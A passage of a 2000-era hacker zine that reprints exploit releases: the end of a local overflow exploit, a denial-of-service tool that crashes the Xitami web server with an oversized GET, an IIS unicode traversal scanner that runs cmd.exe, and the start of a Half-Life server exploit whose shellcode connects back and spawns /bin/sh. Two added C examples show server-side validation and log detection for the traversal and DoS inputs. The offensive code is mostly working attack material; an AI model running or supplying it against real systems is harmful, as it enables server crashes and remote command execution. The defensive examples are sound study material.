      
      int main(argc, argv)
      int argc;
      char **argv;
      {
              char buf[BUFSIZ], *p;
              long ret = 0xbffff960, *ap;
              int noplen;
              int align, i;
      
              if (argc != 3)
              {
                      fprintf(stderr, "Just_For_you: %s <align> <REMEMBER THE OFFSET> ie ./HWA-w00p test 1024\n", argv[0]);
                      exit(0);
              }
      
              align = atoi(argv[1]);
      
              memset(buf, 0x90, 49);
              buf[50] = '\0';
      
              strcat(buf, linuxcode);
      
              ret += atoi(argv[4]);
      
              for(i=0;i<align;i++) strcat(buf, "a");
      
              p = buf + strlen(buf);
              ap = (unsigned long *)p;
      
              for(i = 0; i < ADDRS / 4; i++)
                      *ap++ = ret;
      
              p = (char *)ap;
              *p = '\0';
      
              mkdir(buf, 0666);
      }

      
      @HWA
      
330.0 [HWA] Release: xitami.c DoS by forrest
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://hwa-security.net
      http://hwa-security.net/hot.html
      
      http://hwa-security.net/hot-new/HWA.xitami.c      
      
      /*
         This is DoS against Xitami Webserver v. 2.2b.
         
         Created mostly by me, my name is forrest :>. (sorry because of my poor style)
         This is part of Readme.txt:
         "You want ROCK-SOLID industrial-strength STABILITY?
          Xitami will run for years without maintenance.  We use a special
          memory management library to detect and flush-out memory leaks." -- I don't think so...
         The same version of Xitami Ftpserver is vulnerable to con/con bug, just type
         cd con/con and it will crash the server...
         Greets to my friends from anonyunity, hwa-security and Cyberx- You know who you are ;]
         Also thanks to xfer ( you know best what for :> ) and superluck (because of helping me:>) :>, and k.g :[
         Poland, 2000.         forrest@hq.hack.pl
                               forrest@hwa-security.net
                               
        comments about this or any other code to contact@hwa-security.net
        
        - Cruciphux                         
        
        RELEASED BY Cruciphux 
                    http://hwa-security.net/  
                    OCT 27 2000
        
      */
      #include <fcntl.h>
      #include <sys/types.h> 
      #include <sys/socket.h> 
      #include <netinet/in.h> 
      #include <signal.h> 
      #include <stdio.h> 
      #include <string.h> 
      #include <netdb.h> 
      #include <ctype.h> 
      #include <arpa/nameser.h> 
      #include <sys/stat.h> 
      #include <strings.h> 
      #include <stdio.h> 
      #include <stdlib.h> 
      #include <unistd.h> 
      #include <sys/socket.h>
        void main(int argc, char *argv[])
       {
        int sock;
        struct in_addr addr;
        struct sockaddr_in sin;
        struct hostent *he;
        char *cgistr;  
        char buffer[1024];  
        int count=0;
        int numin;  
        char get[1024];
        char *buff[50];
        buff[1] = "GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa HTTP/1.0\n\n"; 
        get[1] = " Please stand by a while when rebooting the system...\n ";
        if (argc<2)
          {
          printf("Usage: ./xitami <hostname> \n");
          exit(0);
          }
        if  ((he=gethostbyname(argv[1])) == NULL)
          { 
         herror("gethostbyname");
         exit(0);
          }
         sock=socket(AF_INET, SOCK_STREAM, 0);
         bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
         sin.sin_family=AF_INET;
         sin.sin_port=htons(80);
         if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
            {
          perror("connect");
          }
      
          send(sock, "HEAD / HTTP/1.0\n\n",17,0);
          recv(sock, buffer, sizeof(buffer),0);
          close(sock); 
          while(count++ < 1)
           {
             sock=socket(AF_INET, SOCK_STREAM, 0);
             bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
             sin.sin_family=AF_INET; 
             sin.sin_port=htons(80);
             if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
               {
                  perror("connect");
               }
              for(numin=0;numin < 1024;numin++)
               {
                get[numin] = '\0';
                }
            send(sock, buff[count],strlen(buff[count]),0);
            recv(sock, get, sizeof(get),0);
            
        }
      } 
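
      The release above sends one GET whose path runs to several thousand
      bytes, and forrest's note also mentions the "cd con/con" crash. The
      block below is an added example (not code from this zine, from forrest
      or from Xitami) of a server-side check that refuses both inputs before
      acting on them. The limits MAX_LINE and MAX_PATH, the function names and
      the status mapping are assumptions, and the device-name list goes beyond
      the single con/con case the page names.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAX_LINE 2048   /* assumed cap on one request line, in bytes */
#define MAX_PATH 512    /* assumed cap on the decoded path, in bytes */

enum { REQ_OK = 0, REQ_BAD = 400, REQ_FORBIDDEN = 403, REQ_URI_TOO_LONG = 414 };

/* Value of one hex digit, or -1 if c is not a hex digit. */
static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    return (c >= 'a' && c <= 'f') ? c - 'a' + 10 : -1;
}

/* Case-insensitive match of s[0..2] against a three-letter upper-case name. */
static int ieq3(const char *s, const char *name)
{
    return toupper((unsigned char)s[0]) == name[0] &&
           toupper((unsigned char)s[1]) == name[1] &&
           toupper((unsigned char)s[2]) == name[2];
}

/* True if a path component names a DOS device: CON, PRN, AUX, NUL, COM1-9,
   LPT1-9. Only the stem before the first '.' or ':' counts and trailing
   spaces are dropped, so "con", "CON.txt" and "nul " all match. */
static int is_dos_device(const char *seg, size_t len)
{
    size_t n = 0;
    while (n < len && seg[n] != '.' && seg[n] != ':') n++;
    while (n > 0 && seg[n - 1] == ' ') n--;
    if (n == 3)
        return ieq3(seg, "CON") || ieq3(seg, "PRN") ||
               ieq3(seg, "AUX") || ieq3(seg, "NUL");
    if (n == 4 && seg[3] >= '1' && seg[3] <= '9')
        return ieq3(seg, "COM") || ieq3(seg, "LPT");
    return 0;
}

/* Check one request line of len received bytes (no NUL terminator needed).
   On REQ_OK, path holds the percent-decoded path without the query string. */
int check_request_line(const char *line, size_t len, char *path, size_t cap)
{
    size_t i = 0, out = 0, seg;

    if (cap == 0) return REQ_BAD;
    path[0] = '\0';
    if (len > MAX_LINE) return REQ_URI_TOO_LONG;    /* refuse before parsing */

    while (i < len && isupper((unsigned char)line[i])) i++;    /* method */
    if (i == 0 || i > 16 || i >= len || line[i] != ' ') return REQ_BAD;
    if (++i >= len || line[i] != '/') return REQ_BAD;

    for (; i < len && line[i] != ' ' && line[i] != '?' &&
           line[i] != '\r' && line[i] != '\n'; i++) {
        int c = (unsigned char)line[i];
        if (c == '%') {                              /* decode %XX first */
            if (i + 2 >= len) return REQ_BAD;
            int hi = hexval((unsigned char)line[i + 1]);
            int lo = hexval((unsigned char)line[i + 2]);
            if (hi < 0 || lo < 0) return REQ_BAD;
            c = hi * 16 + lo;
            i += 2;
        }
        if (c < 0x20 || c == 0x7f) return REQ_BAD;  /* NUL and control bytes */
        if (c == '\\') c = '/';                      /* Windows separator */
        if (out >= MAX_PATH || out + 1 >= cap) return REQ_URI_TOO_LONG;
        path[out++] = (char)c;
    }
    path[out] = '\0';

    for (seg = 1, i = 1; i <= out; i++) {            /* every path component */
        if (i == out || path[i] == '/') {
            if (is_dos_device(path + seg, i - seg)) return REQ_FORBIDDEN;
            seg = i + 1;
        }
    }
    return REQ_OK;
}

int main(void)
{
    /* Constructed samples, not captured traffic. */
    const char *s[] = { "GET /index.html HTTP/1.0\n", "GET /pub/con/con HTTP/1.0\n",
                        "GET /pub/c%6fn HTTP/1.0\n" };
    char big[4000], path[1024];
    size_t i;
    for (i = 0; i < 3; i++)
        printf("%d  %s", check_request_line(s[i], strlen(s[i]), path, sizeof path), s[i]);
    memcpy(big, "GET /", 5);            /* constructed oversized request */
    memset(big + 5, 'a', 3900);
    printf("%d  GET / + 3900 'a' bytes\n", check_request_line(big, 3905, path, sizeof path));
    return 0;
}
```

      The device-name test runs on the decoded path, so an escaped spelling
      such as c%6fn is refused the same way as con.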
      
      @HWA
      

331.0 [HWA] unicode M$ hack similar to those seen used recently by: Grazer
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~      
      
      http://hwa-security.net
      http://hwa-security.net/hot.html
      
      Check http://hwa-security.net for more; also check 
      http://hwa-security.net/hot.html for new releases.
      
      
      
      
      /* HWA PRIVATE!!!!!! DO NOT DISTRIBUTE!!!!! 
      * ---------------------------------------------------------
      * NT iis Multi-language unicode scanner :)
      * 
      * Idea by pr0ix    -   pr0ix@hwa-security.net
      * Code by grazer   -   grazer@hwa-security.net
      *
      * Greets to all hwa-members : Cruciphux, pr0ix, pyra
      * forrest^, FProphet, eth0^, WhiteRuss, PhantasmP, xtremist, 
      * base2op....and all other cool people i forgot (sorry)
      *
      * Please do not use this tool for illegal purposes!
      * If you do we are not responsible!
      *
      *          grazer
      *
      * RELEASED by Cruciphux http://hwa-security.net/
      * OCT 27 2000
      *
      */
      
      #include<stdio.h>
      #include<string.h>
      #include<sys/socket.h>
      #include<netinet/in.h>
      #include<netdb.h> 
      
      #define RETURN "../winnt/system32/cmd.exe?/c+dir\n\n"
      
      main(int argc, char *argv[]) {
      
      int fd;
      struct sockaddr_in sin;
      struct in_addr addr;
      struct hostent *he;
      
      char not_found[] = "404"; 
      
      char recv_buffer[6024];
      char temp[3];
      char *try_to_find;
      
      int i;
      char char1, char3 = 'a';
      char char2, char4; 
      char percent = '%';
      char charac1, charac2, charac3, charac4, procent;
      
      while(argc<2) {
      printf ("\n [----------------------------] \n");
      printf (" [ NT IIS Unicode BruteForcer ] \n");
      printf (" [----------------------------] \n");
      printf (" [ usage : unibrute <NT_host> ] \n");
      printf (" [ by    :             grazer ] \n\n");     
      exit(0);   
      }
      
      if ((he=gethostbyname(argv[1])) == NULL) { 
           printf("\n [ Cannot Find Host!.. ] \n\n"); 
           exit(0); }
           
      printf("\n [ Starting NT Unicode Bruteforcer..]\n");   
      
      for (char1='a'; char1<='z'; char1++) {
      for (char3= 'a'; char3<='z'; char3++) {
      for (char2='0'; char2<='9'; char2++) {
         for (char4='0'; char4<='9'; char4++) {
      char buffer[1024] = "GET /scripts/..";
      fd = socket(AF_INET, SOCK_STREAM, 0);
      bcopy(he->h_addr, (char *) &sin.sin_addr, he->h_length);
      sin.sin_family=AF_INET;
      sin.sin_port=htons(80);
        
      
      if(connect(fd, (struct sockaddr*)&sin, sizeof(sin))!=0)
      {
      printf ("\n [ Cannot Connect() to Host ] \n\n ");
      exit(0);
      }
      
      buffer[15] = percent; buffer[16] = char1; buffer[17] = char2;
      buffer[18] = percent; buffer[19] = char3; buffer[20] = char4;
      strcat(buffer, RETURN);
      
      fprintf(stdout, ".");
      send(fd, buffer, sizeof(buffer), 0);
      recv(fd, recv_buffer, sizeof(recv_buffer), 0);
      
      close(fd);
      
      bzero(buffer, sizeof(buffer));
      
      try_to_find = strstr(recv_buffer,not_found);
      while(try_to_find == NULL)
      
      {
        printf ("\n [     Server is Vulnerable !!      ]\n");
        printf (" [               %c%c%c%c%c%c             ]\n\n", percent,
      char1, char2, percent, char3 , char4);
         
        exit(0); 
           }
          }
         }
        }
      }
      printf ("\n [   Sorry Nothing Found on Server..  ]\n");
      }
      
      @HWA
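
      Seen from the web server's side, the probe built above is a request path in which ".." sits next to percent-escaped bytes, followed by cmd.exe. The C classifier below is an added example, not part of the original release; its function and flag names are this example's own, and the request lines are constructed (`%a0%a0` is the first value the scanner's loops generate).

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Result flags (names belong to this example, not to any product). */
#define REQ_ESCAPED_TRAVERSAL 0x1  /* ".." together with suspicious escapes */
#define REQ_CMD_INTERPRETER   0x2  /* path names cmd.exe */

static int hex_digit(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* Byte-wise search, so a decoded NUL cannot hide the rest of the path. */
static int contains(const unsigned char *buf, size_t n, const char *needle)
{
    size_t m = strlen(needle), i;
    for (i = 0; m <= n && i <= n - m; i++)
        if (memcmp(buf + i, needle, m) == 0) return 1;
    return 0;
}

/* Classify one logged request line ("METHOD target [version]").
 * Only the path is inspected; the query string is ignored.
 * Plain ".." without escapes is left to the server's own path check;
 * this function targets the escaped form the scanner sends. */
int classify_request_line(const char *line)
{
    unsigned char dec[2048];          /* longer paths are truncated */
    size_t n = 0;
    int odd_escape = 0, flags = 0;
    const char *p = strchr(line, ' ');

    if (p == NULL) return 0;          /* no method/target separator */
    while (*p == ' ') p++;

    for (; *p && *p != '?' && *p != ' ' && *p != '\r' && *p != '\n'; p++) {
        unsigned char b = (unsigned char)*p;
        if (b == '%') {
            int hi = hex_digit((unsigned char)p[1]);
            int lo = hi < 0 ? -1 : hex_digit((unsigned char)p[2]);
            if (lo < 0) {
                odd_escape = 1;       /* malformed escape such as %z9 */
            } else {
                b = (unsigned char)(hi * 16 + lo);
                p += 2;
                /* High-bit bytes, separators and dots have no reason
                 * to be escaped inside a path that also climbs. */
                if (b >= 0x80 || b == '/' || b == '\\' || b == '.')
                    odd_escape = 1;
            }
        }
        if (n + 1 < sizeof dec) dec[n++] = (unsigned char)tolower(b);
    }
    dec[n] = '\0';

    if (odd_escape && contains(dec, n, ".."))
        flags |= REQ_ESCAPED_TRAVERSAL;
    if (contains(dec, n, "cmd.exe"))
        flags |= REQ_CMD_INTERPRETER;
    return flags;
}

int main(void)
{
    /* Constructed request lines, not taken from a real log. */
    static const char *samples[] = {
        "GET /scripts/..%a0%a0../winnt/system32/cmd.exe?/c+dir",
        "GET /scripts/..%z9%z9../x HTTP/1.0",
        "GET /a/%2e%2e/b HTTP/1.0",
        "GET /docs/caf%c3%a9.html HTTP/1.0",
        "GET /tools/CMD.EXE?/c+ver HTTP/1.0",
        "GET /index.html HTTP/1.0",
    };
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%d  %s\n", classify_request_line(samples[i]), samples[i]);
    return 0;
}
```

      Because the scanner walks a-z for the first character of each escape, most of its probes are not valid hex at all; the malformed-escape branch is what catches those.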

332.0 [HWA] Release: Hlds Half life server vuln by csh **
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     ** This was also released in another form by csh and another security team;
     both versions of the code are included here with comments.
     
      
     
     /*
      --- advisory here (vvvv) ---
      
       
       THIS IS A PRIVATE RELEASE - DO NOT DISTRIBUTE IT
       
      * distribution note: 
      * released through hwa-security.net Oct 23 2000 *
      * EFNet #hwa-security contact@hwa-security.net
      * posted by csh
       
      --- end of advisory --- 
      
      
      ----- tmd info tag -----
      v  HalfLife Dedicated Server    (3.1.0.x)
      w  october, 19th 2000
      a  Thiago Zaninotti             (thiago@sekure.org)
      a  Gustavo Scotti               (scotti@sekure.org)
      g  Tamanduah Sekure Labs        (http://tamandua.sekure.org)
      i  do not run this behind a masquerade server. the shellcode is a connect back
      i  and it does probe for local address/port for buffer alignment.
      */
      
      #include <stdlib.h>
      #include <stdio.h>
      #include <netinet/in.h>
      #include <sys/socket.h>
      #include <sys/time.h>
      #include <netdb.h>
      
      typedef unsigned long   u32;
      typedef unsigned short  u16;
      typedef unsigned char   u8;
      
      /* shell code source code.
      
         jmp    next
      back:
         popl   %esi
         jmp    start
      next:
         call   back
         .string \"0123456789012345/bin/sh\"
      
      start:   
         // now some adds to include the sockaddr stuff
         // fill in sin family
         xorl   %eax, %eax
         incw   %ax
         incw   %ax
         movw   %ax,  (%esi)    // FAMILY 2 = AF_INET
         xorl   %ecx, %ecx
         movb   $0x8, %cl
         movl   %esi, %edi
         addl   $0x8, %edi
         // now pad 0 sock_addr
         xorb   %al,  %al
      redo:
         movb   %al, (%edi)
         incl   %edi
         decl   %ecx
         jnz    redo
      
         // kernel socket buffer is allocated 0x20 after sockaddr
         // socket 
             xorl   %eax, %eax
             movl   %eax, 0x28(%esi)          // 0, TCP/IP 
             incl   %eax
             movl   %eax, 0x24(%esi)          // 1, SOCK_STREAM
             incl   %eax
             movl   %eax, 0x20(%esi)          // 2, AF_INET
             leal   0x20(%esi), %ecx          // params to socket syscall
             xorl   %ebx, %ebx
             incl   %ebx                      // ebx = 1 - function socket
             xor    %eax, %eax
             addl   $0x66, %eax               // socket syscall
             int    $0x80                     // syscall int
      
         mov    %eax, %edi
         // %edi is the socket descriptor 
         // connect 
             movl   %eax, 0x20(%esi)          // socket
             leal   (%esi), %eax
             movl   %eax, 0x24(%esi)          // &sockaddr_in
             xorl   %eax, %eax
             addl   $0x10, %eax               // sizeof(sockaddr_in)
             movl   %eax, 0x28(%esi)          
      
             leal   0x20(%esi), %ecx          // params to socket syscall
             xorl   %ebx, %ebx
             incl   %ebx                      
             incl   %ebx                      
             incl   %ebx                      // ebx = 2 - function connect
             xorl   %eax, %eax
             addl   $0x66, %eax               // socket syscall
             push   %edi                      // save your socket descriptor
             int    $0x80                     // syscall int
             pop    %edi
      
         // dup2 sock, 0 
             xorl   %eax, %eax
             addl   $0x3f, %eax
             movl   %edi,  %ebx
             xorl   %ecx,  %ecx
             int    $0x80
      
         // dup2 0, 1
             xorl   %eax, %eax
             addl   $0x3f, %eax
             xorl   %ebx,  %ebx
             xorl   %ecx,  %ecx
             incl   %ecx
             int    $0x80
      
         // dup2 0, 2
             xorl   %eax, %eax
             addl   $0x3f, %eax
             xorl   %ebx,  %ebx
             xorl   %ecx,  %ecx
             incl   %ecx
             incl   %ecx
             int    $0x80
      
         // trivial shell-code
         movl   %esi,  %eax
         addl   $0x18, %eax       // address where ENVP will be stored
         movl   %eax, 0x18(%esi)  // *envp
      
         xorl   %eax, %eax
         movb   %al,  0x17(%esi)
         movl   %eax, 0x1c(%esi)
      
         movb   $0xb, %al
         leal   0x18(%esi), %ecx    // params 
         leal   0x1c(%esi), %edx    // envp 
         movl   %esi, %ebx
         addl   $0x10, %ebx
         int    $0x80
         xorl   %eax, %eax
         incl   %eax
         int    $0x80
      */
      
      unsigned char shellcode[]=
      "\xeb\x03\x5e\xeb\x1d\xe8\xf8\xff\xff\xff.www.sekure.org."
      "\x2f\x62\x69\x6e\x2f"
      "\x73\x68\x40\x31\xc0\x66\x40\x66\x40\x66\x89\x06\x31\xc9\xb1\x08"
      "\x89\xf7\x83\xc7\x08\x30\xc0\x88\x07\x47\x49\x75\xfa\x31\xc0\x89"
      "\x46\x28\x40\x89\x46\x24\x40\x89\x46\x20\x8d\x4e\x20\x31\xdb\x43"
      "\x31\xc0\x83\xc0\x66\xcd\x80\x89\xc7\x89\x46\x20\x8d\x06\x89\x46"
      "\x24\x31\xc0\x83\xc0\x10\x89\x46\x28\x8d\x4e\x20\x31\xdb\x43\x43"
      "\x43\x31\xc0\x83\xc0\x66\x57\xcd\x80\x5f\x31\xc0\x83\xc0\x3f\x89"
      "\xfb\x31\xc9\xcd\x80\x31\xc0\x83\xc0\x3f\x31\xdb\x31\xc9\x41\xcd"
      "\x80\x31\xc0\x83\xc0\x3f\x31\xdb\x31\xc9\x41\x41\xcd\x80\x89\xf0"
      "\x83\xc0\x18\x89\x46\x18\x31\xc0\x88\x46\x17\x89\x46\x1c\xb0\x0b"
      "\x8d\x4e\x18\x8d\x56\x1c\x89\xf3\x83\xc3\x10\xcd\x80\x31\xc0\x40"
      "\xcd\x80";
      
      /* NET functions */
      int
      udp_read( int sock, u32 *daddr, u16 *port, void *ptr, u16 ptr_size)
      {
              struct sockaddr_in server;
              int i,n;
              i = sizeof(server);
              n=recvfrom( sock, ptr, ptr_size, 0, (struct sockaddr *)&server, &i);
              *daddr = ntohl(server.sin_addr.s_addr);
              *port = ntohs(server.sin_port);
              return n;
      }
      
      int
      udp_send( int sock, u32 daddr, u16 port, void *ptr, u16 ptr_size)
      {
              struct sockaddr_in server;
              server.sin_family = AF_INET;
              server.sin_port = htons( port);
              server.sin_addr.s_addr = htonl( daddr);
              return sendto( sock, ptr, ptr_size, 0, (struct sockaddr *)&server, sizeof(server));
      }
      
      int
      udp_connect( u32 addr, u16 port)
      {
              struct sockaddr_in client;
              int new_fd;
      
              new_fd = socket( AF_INET, SOCK_DGRAM, 0);
              if (new_fd<0)
                 return new_fd;
      
              bzero( (char *) &client, sizeof( client));
              client.sin_family = AF_INET;
              client.sin_addr.s_addr = htonl( addr);
              client.sin_port = htons( port);
              if (connect( new_fd, (struct sockaddr *)&client, sizeof(client))<0)
                 return -1; /* cant bind local address */
      
              return new_fd;
      }
      
      
      u32 dns2ip( u8 *host)
      {
              struct hostent *dns;
              u32     saddr;
              dns = gethostbyname( host);
              if (!dns)
                 return 0xffffffff;
              bcopy( (char *)dns->h_addr, (char *)&saddr, dns->h_length);
              return ntohl(saddr);
      }
      
      
      int
      async_read( int sock_r, int rettime)
      {
         fd_set           fd_r;
         struct timeval   tv;
         char             try_ch[4]="/-\\|";
      
         int r,j;
      
         for (r=0;r<rettime;r++)
             {
             for (j=0;j<20;)
                 {
                 int i;
      
                 printf("\b%c", try_ch[(j%4)]);
                 fflush(stdout);
      
                 FD_ZERO( &fd_r);
                 FD_SET( sock_r, &fd_r);
      
                 tv.tv_sec  = 0;
                 tv.tv_usec = 50000;
      
                 
                 i =select( sock_r + 1, &fd_r, NULL, NULL, &tv);
                 if (!i) { j++; continue; }
                 if (i>0)
                    if (FD_ISSET(sock_r, &fd_r)) return sock_r;
                 else
                    return -1;
                 }
             }
         return -1;
      }
      
      int
      get_server_info( int sock, u32 addr, u16 port)
      {
         u32 r_addr;
         u16 r_port;
         int n, i;
         u8  pkt[256], *str;
      
         pkt[0] = pkt[1] = pkt[2] = pkt[3] = 0xff;
         sprintf(&pkt[4], "details");
      
         n = udp_send(sock, addr, port, pkt, strlen(pkt));
         printf(".  connecting to the server...  "); fflush(stdout);
         if (async_read(sock, 6)<0)
             goto server_down;
         n = udp_read(sock, &addr, &port, pkt, sizeof(pkt));
         if (n<0)
              {
      server_down:
              printf("\bserver down!\r*\n");
              exit(0);
              }
         printf("\bdone\n");
         str = &pkt[4]; 
         str+=strlen(str)+1;
         printf("\t server_name  [%s]\n", str); str+=strlen(str)+1;
         printf("\t    map_name  [%s]\n", str); str+=strlen(str)+1;
         str+=strlen(str)+1;
      
         printf("\t   game_name  [%s]\n", str); str+=strlen(str)+1;
         printf("\tusers_online  [%d of %d]\n", str[0], str[1]); str+=3;
